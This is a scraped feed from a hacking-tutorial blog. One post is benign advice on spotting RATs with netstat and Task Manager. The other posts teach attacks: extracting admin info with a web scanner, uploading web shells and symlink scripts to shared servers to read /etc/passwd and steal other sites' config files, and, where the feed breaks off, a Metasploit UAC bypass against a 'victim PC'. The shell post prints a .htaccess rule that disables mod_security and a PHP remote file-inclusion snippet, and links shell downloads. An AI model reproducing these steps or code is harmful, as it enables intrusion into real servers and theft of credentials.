&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;img alt=&quot;How To Hack A Website With WebCruiser Scanner - FOCSoft&quot; border=&quot;0&quot; height=&quot;472&quot; src=&quot;http://i.imgur.com/phfVa9g.png&quot; style=&quot;width: 605px;&quot; title=&quot;How To Hack A Website With WebCruiser Scanner - FOCSoft&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;
&lt;div class=&quot;smalltext&quot; id=&quot;fop_topbar7&quot; style=&quot;background: url(&amp;quot;&amp;quot;) no-repeat scroll left center rgb(26, 26, 26); cursor: pointer; margin: 0px auto; padding: 3px 3px 3px 20px; text-align: left; width: 582px;&quot;&gt;
&lt;div class=&quot;smalltext&quot; id=&quot;fop_topbar9&quot; style=&quot;background: url(&amp;quot;&amp;quot;) no-repeat scroll left center rgb(26, 26, 26); cursor: pointer; margin: 0px auto; padding: 3px 3px 3px 20px; text-align: center; width: 582px;&quot;&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;background-color: #cccccc;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://focsoft.blogspot.com/&quot; target=&quot;_blank&quot;&gt;Hacking Tools And Hacking Tutorials&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;fop_img7&quot; style=&quot;cursor: pointer; margin: 0px auto; width: 605px;&quot;&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;img alt=&quot;How To Hack A Website With WebCruiser Scanner - FOCSoft&quot; border=&quot;0&quot; height=&quot;396&quot; src=&quot;http://i.imgur.com/3YvtmUW.png&quot; style=&quot;width: 605px;&quot; title=&quot;How To Hack A Website With WebCruiser Scanner - FOCSoft&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;
&lt;div class=&quot;smalltext&quot; id=&quot;fop_topbar8&quot; style=&quot;background: url(&amp;quot;&amp;quot;) no-repeat scroll left center rgb(26, 26, 26); cursor: pointer; margin: 0px auto; padding: 3px 3px 3px 20px; text-align: left; width: 582px;&quot;&gt;
&lt;div class=&quot;smalltext&quot; id=&quot;fop_topbar9&quot; style=&quot;background: url(&amp;quot;&amp;quot;) no-repeat scroll left center rgb(26, 26, 26); cursor: pointer; margin: 0px auto; padding: 3px 3px 3px 20px; text-align: center; width: 582px;&quot;&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;background-color: #cccccc;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://focsoft.blogspot.com/&quot; target=&quot;_blank&quot;&gt;Hacking Tools And Hacking Tutorials&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;fop_img8&quot; style=&quot;cursor: pointer; margin: 0px auto; width: 605px;&quot;&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;img alt=&quot;How To Hack A Website With WebCruiser Scanner - FOCSoft&quot; border=&quot;0&quot; height=&quot;395&quot; src=&quot;http://i.imgur.com/Gxoh9BY.png&quot; style=&quot;width: 605px;&quot; title=&quot;How To Hack A Website With WebCruiser Scanner - FOCSoft&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;
&lt;div class=&quot;smalltext&quot; id=&quot;fop_topbar9&quot; style=&quot;background: url(&amp;quot;&amp;quot;) no-repeat scroll left center rgb(26, 26, 26); cursor: pointer; margin: 0px auto; padding: 3px 3px 3px 20px; text-align: center; width: 582px;&quot;&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;background-color: #cccccc;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://focsoft.blogspot.com/&quot; target=&quot;_blank&quot;&gt;Hacking Tools And Hacking Tutorials&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div id=&quot;fop_img9&quot; style=&quot;cursor: pointer; margin: 0px auto; width: 605px;&quot;&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;img alt=&quot;How To Hack A Website With WebCruiser Scanner - FOCSoft&quot; border=&quot;0&quot; height=&quot;368&quot; src=&quot;http://img5.imageshack.us/img5/6847/mjqc.png&quot; title=&quot;How To Hack A Website With WebCruiser Scanner - FOCSoft&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;
So that&#39;s all guys, we got the admin info in just 5 minutes :&amp;gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/984579786275106571/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/03/WebCruiser.html#comment-form' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/984579786275106571'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/984579786275106571'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/03/WebCruiser.html' title='How To Hack A Website With WebCruiser Scanner - FOCSoft'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-313139824179740459</id><published>2014-03-17T18:30:00.000+05:00</published><updated>2014-03-17T18:30:57.713+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><title type='text'>Detecting RATs/Keyloggers Installed On Your PC Using CMD And TaskManager - FOCSoft </title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;background-color: orange;&quot;&gt;Hello Friends &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
In this tutorial, I&#39;ll be showing you the easiest way of finding out 
malicious applications installed on your PC that transfer data using the
 internet without you knowing it.&lt;br /&gt;
&lt;br /&gt;
As stated in the title, we&#39;ll be using TaskManager and CMD for the purposes of this tutorial.&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;hr style=&quot;margin-left: auto; margin-right: auto;&quot; /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img alt=&quot;Detecting RATs/Keyloggers Installed On Your PC Using CMD And TaskManager - FOCSoft &quot; border=&quot;0&quot; src=&quot;http://i.imgur.com/EU1A3x6.png&quot; title=&quot;Detecting RATs/Keyloggers Installed On Your PC Using CMD And TaskManager - FOCSoft &quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
1. To get started, open up your TaskManager by right clicking your 
TaskBar and selecting TaskManager or just hit CTRL+ALT+DEL to get it 
open.&lt;br /&gt;&lt;br /&gt;
2. Once that is done, click the &quot;Processes&quot; tab of your TaskManager and 
click View -&amp;gt; Select Columns -&amp;gt; Make sure that &quot;Process 
Identifier(PID)&quot; is ticked.&lt;br /&gt;&lt;br /&gt;&lt;img alt=&quot;Detecting RATs/Keyloggers Installed On Your PC Using CMD And TaskManager - FOCSoft &quot; border=&quot;0&quot; src=&quot;http://i.imgur.com/So5iBIG.png&quot; title=&quot;Detecting RATs/Keyloggers Installed On Your PC Using CMD And TaskManager - FOCSoft &quot; /&gt;&lt;br /&gt;&lt;br /&gt;
3. Now click the PID column to make sure that all the processes are 
sorted in a specific order. This step is not necessary, but it will make
 it easier for you to detect processes using their IDs.&lt;br /&gt;&lt;br /&gt;&lt;img alt=&quot;Detecting RATs/Keyloggers Installed On Your PC Using CMD And TaskManager - FOCSoft &quot; border=&quot;0&quot; src=&quot;http://i.imgur.com/Iz3VtpJ.png&quot; title=&quot;Detecting RATs/Keyloggers Installed On Your PC Using CMD And TaskManager - FOCSoft &quot; /&gt;&lt;br /&gt;&lt;/div&gt;
&lt;hr style=&quot;margin-left: auto; margin-right: auto;&quot; /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img alt=&quot;Detecting RATs/Keyloggers Installed On Your PC Using CMD And TaskManager - FOCSoft &quot; border=&quot;0&quot; src=&quot;http://i.imgur.com/pmv2ItE.png&quot; title=&quot;Detecting RATs/Keyloggers Installed On Your PC Using CMD And TaskManager - FOCSoft &quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
Once you&#39;ve done that right, we&#39;re going to move on to part 2 of our 
tutorial, which is using CMD to view established connections.&lt;br /&gt;&lt;br /&gt;
Assuming you know how to open up CMD, I&#39;m just going to rush through step 1.&lt;br /&gt;
1. Start -&amp;gt; Run -&amp;gt; CMD&lt;br /&gt;
OR&lt;br /&gt;
Just type in cmd in the searchbar if you&#39;re running a system powered by Windows7.&lt;br /&gt;&lt;br /&gt;
2. Once cmd is open, I want you to type in &quot;netstat -ano&quot;.&lt;br /&gt;
Your result should be something like this:&lt;/div&gt;
&lt;br /&gt;&lt;div id=&quot;fop_img1&quot; style=&quot;cursor: pointer; margin: 0px; text-align: center; width: 605px;&quot;&gt;
&lt;img alt=&quot;Detecting RATs/Keyloggers Installed On Your PC Using CMD And TaskManager - FOCSoft &quot; border=&quot;0&quot; height=&quot;214&quot; src=&quot;http://i.imgur.com/75xp0C4.png&quot; style=&quot;width: 605px;&quot; title=&quot;Detecting RATs/Keyloggers Installed On Your PC Using CMD And TaskManager - FOCSoft &quot; width=&quot;400&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;&lt;br /&gt;
3. Now what we&#39;re interested in are only the connections with the state &quot;ESTABLISHED&quot;.&lt;br /&gt;
Isolate them out and look for the PID right next to them. There will be 
many connections with &quot;ESTABLISHED&quot; state, you&#39;ll have to repeat the 
following steps for all of them.&lt;br /&gt;&lt;/div&gt;
&lt;div id=&quot;fop_img2&quot; style=&quot;cursor: pointer; margin: 0px; text-align: center; width: 605px;&quot;&gt;
&lt;img alt=&quot;Detecting RATs/Keyloggers Installed On Your PC Using CMD And TaskManager - FOCSoft &quot; border=&quot;0&quot; src=&quot;http://i.imgur.com/2U2fQNs.png&quot; style=&quot;width: 605px;&quot; title=&quot;&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;&lt;br /&gt;
This is the fun part. Now go back to the TaskManager and look for the 
name of the process(es) that has the same PID(s) as the one you found 
with the ESTABLISHED connection(s).&lt;br /&gt;&lt;/div&gt;
&lt;div id=&quot;fop_img3&quot; style=&quot;cursor: pointer; margin: 0px; text-align: center; width: 605px;&quot;&gt;
&lt;img alt=&quot;Detecting RATs/Keyloggers Installed On Your PC Using CMD And TaskManager - FOCSoft &quot; border=&quot;0&quot; height=&quot;324&quot; src=&quot;http://i.imgur.com/mSBPnZn.png&quot; title=&quot;Detecting RATs/Keyloggers Installed On Your PC Using CMD And TaskManager - FOCSoft &quot; width=&quot;640&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;&lt;br /&gt;
In the above case, it&#39;s a safe and trusted application known as Dropbox,
 so I&#39;m good. But incase you find a process which you do not know, if 
it&#39;s something like svchost.exe that you&#39;re sure is infected, right 
click the process and select &quot;Open File Location&quot;.&lt;br /&gt;&lt;br /&gt;
Now all you have to do is right click the file and scan it using your AV
 or upload it to an online scanner such as VirusTotal.com and check if 
it&#39;s infected.&lt;br /&gt;&lt;/div&gt;
&lt;div id=&quot;fop_img4&quot; style=&quot;cursor: pointer; margin: 0px; text-align: center; width: 605px;&quot;&gt;
&lt;img alt=&quot;Detecting RATs/Keyloggers Installed On Your PC Using CMD And TaskManager - FOCSoft &quot; border=&quot;0&quot; height=&quot;324&quot; src=&quot;http://i.imgur.com/ycn4yyH.png&quot; title=&quot;Detecting RATs/Keyloggers Installed On Your PC Using CMD And TaskManager - FOCSoft &quot; width=&quot;640&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;hr style=&quot;margin-left: auto; margin-right: auto;&quot; /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;
It&#39;s as easy as that.&lt;br /&gt;
Hope you find this useful.&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/313139824179740459/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/03/How-To-DetectingRATs-Keyloggers.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/313139824179740459'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/313139824179740459'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/03/How-To-DetectingRATs-Keyloggers.html' title='Detecting RATs/Keyloggers Installed On Your PC Using CMD And TaskManager - FOCSoft '/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-112253178455666010</id><published>2014-03-17T18:10:00.000+05:00</published><updated>2014-03-17T18:10:44.817+05:00</updated><title type='text'>403 Forbidden And Can&#39;t Read /ect/named.conf Error Bypass - FOCSoft</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://oi50.tinypic.com/120qy4l.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-color: orange;&quot;&gt;Hello Friends&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: Impact;&quot;&gt;In These days Linux Kernel server show this error when you try 
to symlink the server . Most of the server which shows 403 forbidden has
 cant read named.config error when you try to symlink using scripts like
 Symlink_Sa or Madspot Security Team Shell or what ever script used for 
Automated Symlink .&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img alt=&quot;[Image: 1625s9e.jpg]&quot; border=&quot;0&quot; height=&quot;138&quot; src=&quot;http://i45.tinypic.com/1625s9e.jpg&quot; width=&quot;400&quot; /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This can be bypassed by Reading /ect/passwd and Symlink_Sa 3.0 can be used to bypass this .&lt;br /&gt;
&lt;br /&gt;
I will be posting the download link of some shells i will be using in this tutorial&lt;br /&gt;
&lt;br /&gt;
Best Script which can bypass cant read /ect/named.conf are :&lt;br /&gt;
&lt;br /&gt;
1. Config Fucker By Web Root Hack Tools. ( Mass Symlink Config files )&lt;br /&gt;
2. Config Killer By Team Indishell . ( Mass Symlink Config file php based script )&lt;br /&gt;
3. Symlink Pain [~] allsoft.pl ( Perl Script to Mass Symlink Config files )&lt;br /&gt;
4. Symlink_Sa 3.0 Automated Symlink Script .&lt;br /&gt;
&lt;br /&gt;
Usage : Config Fucker , Con fig Killer and Symlink Pain [~] Perl script 
just upload them on to the server make sure that you create a new 
directory . Upload the scirpt and use the command cat /ect/passwd to 
read all /ect/passwd from the server and copy them and just open your 
script and paste it there and click on Get Config and Your Done . Just 
open the link of the folder you created eg . site.com/sen/allsoft.pl you
 need to open site.com/sen/ and all config files will be there&lt;br /&gt;
&lt;br /&gt;
Note : Its better to create a php.ini file before you do this for 100 % Result&lt;br /&gt;
&lt;br /&gt;
All 4 shells i have mentioned i will post the download link&lt;br /&gt;
&lt;br /&gt;
And i will be using a another private shell for this which i wont be 
giving you all for Priv8 Issue its Mannu Shell Coded by Team Indishell 
Which can bypass cant read /ect/named.conf error easily . But 403 
Forbidden Server cant be bypassed using this shell .&lt;br /&gt;
&lt;br /&gt;
So now if we cant to symlink to the Public_html/ of the website we can use Symlink_sa 3.0 script Symlink Bypass Option -&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img alt=&quot;403 Forbidden And Can&#39;t Read /ect/named.conf Error Bypass - FOCSoft&quot; border=&quot;0&quot; height=&quot;384&quot; src=&quot;http://i48.tinypic.com/jktva0.jpg&quot; title=&quot;403 Forbidden And Can&#39;t Read /ect/named.conf Error Bypass - FOCSoft&quot; width=&quot;400&quot; /&gt;&lt;/div&gt;
&lt;br /&gt;
So now that we can easily Symlink to /Public_html/ path of each website&lt;br /&gt;
&lt;br /&gt;
Now some server show 403 forbidden Error when you try to Symlink them so now lets see how to by pass this shit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
For 403 Forbidden Error i will be Using the Following Shells :&lt;br /&gt;
&lt;br /&gt;
1. Dhanush Shell Coded By Arjun . ( This shell automitically creates .htaccess , php.ini and ini.php files after you login )&lt;br /&gt;
2. Mannu Shell by Team Indishell Private ! .&lt;br /&gt;
3. Symlink_sa 3.0 Script&lt;br /&gt;
&lt;br /&gt;
I will be posting the download link of Dhanush shell and Symlink _sa 3.0 ( Mannu shell is private as i already told )&lt;br /&gt;
&lt;br /&gt;
So what is the trick that makes us bypass 403 Forbidden , Its just the .htaccess and php.ini which contains the following code :&lt;br /&gt;
&lt;br /&gt;
.htaccess&lt;br /&gt;
&lt;br /&gt;
&lt;ifmodule mod_security.c=&quot;&quot;&gt;&lt;br /&gt;
SecFilterEngine Off&lt;br /&gt;
SecFilterScanPOST Off&lt;br /&gt;
&lt;/ifmodule&gt;&lt;br /&gt;
&lt;br /&gt;
php.ini&lt;br /&gt;
&lt;br /&gt;

echo ini_get(&quot;safe_mode&quot;);&lt;br /&gt;
echo ini_get(&quot;open_basedir&quot;);&lt;br /&gt;
include($_GET[&quot;file&quot;]);&lt;br /&gt;
ini_restore(&quot;safe_mode&quot;);&lt;br /&gt;
ini_restore(&quot;open_basedir&quot;);&lt;br /&gt;
echo ini_get(&quot;safe_mode&quot;);&lt;br /&gt;
echo ini_get(&quot;open_basedir&quot;);&lt;br /&gt;
include($_GET[&quot;ss&quot;]);&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&lt;br /&gt;
1.) 403 Forbidden Error :&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img alt=&quot;403 Forbidden And Can&#39;t Read /ect/named.conf Error Bypass - FOCSoft&quot; border=&quot;0&quot; height=&quot;112&quot; src=&quot;http://i50.tinypic.com/29w4dv5.jpg&quot; title=&quot;403 Forbidden And Can&#39;t Read /ect/named.conf Error Bypass - FOCSoft&quot; width=&quot;400&quot; /&gt;&lt;/div&gt;
&lt;br /&gt;
2.) Open Dhanush Shell which automatically creates .htaccess , php.ini and ini.php .&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img alt=&quot;403 Forbidden And Can&#39;t Read /ect/named.conf Error Bypass - FOCSoft&quot; border=&quot;0&quot; src=&quot;http://oi48.tinypic.com/15zhwdh.jpg&quot; height=&quot;126&quot; title=&quot;403 Forbidden And Can&#39;t Read /ect/named.conf Error Bypass - FOCSoft&quot; width=&quot;400&quot; /&gt;&lt;/div&gt;
&lt;br /&gt;
3.) Mannu shell to Check if we Bypassed 403 Error :&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img alt=&quot;403 Forbidden And Can&#39;t Read /ect/named.conf Error Bypass - FOCSoft&quot; border=&quot;0&quot; height=&quot;175&quot; src=&quot;http://i49.tinypic.com/elke9.jpg&quot; title=&quot;403 Forbidden And Can&#39;t Read /ect/named.conf Error Bypass - FOCSoft&quot; width=&quot;400&quot; /&gt;&lt;/div&gt;
&lt;br /&gt;
 4.) Bypassed 403 Forbidden and Access to Public_html/ Path &lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img alt=&quot;403 Forbidden And Can&#39;t Read /ect/named.conf Error Bypass - FOCSoft&quot; border=&quot;0&quot; src=&quot;http://oi50.tinypic.com/120qy4l.jpg&quot; height=&quot;212&quot; title=&quot;403 Forbidden And Can&#39;t Read /ect/named.conf Error Bypass - FOCSoft&quot; width=&quot;400&quot; /&gt;&lt;/div&gt;
&lt;br /&gt;
Bypassed can&#39;t read /ect/named.conf and 403 forbidden Error&lt;br /&gt;
&lt;br /&gt;
Here Download Link of all shell and script i used : &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href=&quot;http://www.mediafire.com/?4bnp4xwyou7iyeb&quot; target=&quot;_blank&quot;&gt;Download From Here&lt;/a&gt; &lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/112253178455666010/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/03/ErrorBypass.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/112253178455666010'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/112253178455666010'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/03/ErrorBypass.html' title='403 Forbidden And Can&#39;t Read /ect/named.conf Error Bypass - FOCSoft'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://i45.tinypic.com/1625s9e_th.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-5503477268385977845</id><published>2014-03-17T17:41:00.001+05:00</published><updated>2014-03-17T17:41:23.318+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><title type='text'>How To Bypass UAC Protection Of Remote Windows PC in Memory Injection - FOCSoft</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;post-title entry-title&quot; itemprop=&quot;name&quot; style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-color: orange;&quot;&gt;Hello Friends &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;background: white; mso-bidi-font-size: 11.5pt;&quot;&gt;&lt;/span&gt;&lt;div class=&quot;MsoNoSpacing&quot; style=&quot;text-align: justify; text-justify: inter-ideograph;&quot;&gt;
&lt;span style=&quot;background: white; mso-bidi-font-size: 11.5pt;&quot;&gt;This module will bypass
Windows UAC by utilizing the trusted publisher certificate through process
injection. It will spawn a second shell that has the UAC flag turned off. This
module uses the Reflective DLL Injection technique to drop only the DLL payload
binary instead of three seperate binaries in the standard technique. However,
it requires the correct architecture to be selected, (use x64 for SYSWOW64
systems also)&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNoSpacing&quot; style=&quot;text-align: justify; text-justify: inter-ideograph;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNoSpacing&quot; style=&quot;text-align: justify; text-justify: inter-ideograph;&quot;&gt;
&lt;b&gt;Exploit
Targets&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNoSpacing&quot; style=&quot;text-align: justify; text-justify: inter-ideograph;&quot;&gt;
&lt;span style=&quot;background: white; mso-bidi-font-size: 10.0pt;&quot;&gt;Windows 32 bit&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNoSpacing&quot; style=&quot;text-align: justify; text-justify: inter-ideograph;&quot;&gt;
&lt;span style=&quot;background: white; mso-bidi-font-size: 10.0pt;&quot;&gt;Windows 64 bit&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNoSpacing&quot; style=&quot;text-align: justify; text-justify: inter-ideograph;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNoSpacing&quot; style=&quot;text-align: justify; text-justify: inter-ideograph;&quot;&gt;
&lt;b&gt;Requirement&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNoSpacing&quot; style=&quot;text-align: justify; text-justify: inter-ideograph;&quot;&gt;
&lt;b&gt;Attacker&lt;/b&gt;: kali Linux&lt;/div&gt;
&lt;div class=&quot;MsoNoSpacing&quot; style=&quot;text-align: justify; text-justify: inter-ideograph;&quot;&gt;
&lt;b&gt;Victim
PC&lt;/b&gt;: Windows&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;MsoNoSpacing&quot; style=&quot;text-align: justify; text-justify: inter-ideograph;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNoSpacing&quot; style=&quot;text-align: justify; text-justify: inter-ideograph;&quot;&gt;
Open Kali terminal type&amp;nbsp;&lt;b&gt;msfconsole&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNoSpacing&quot; style=&quot;text-align: justify; text-justify: inter-ideograph;&quot;&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
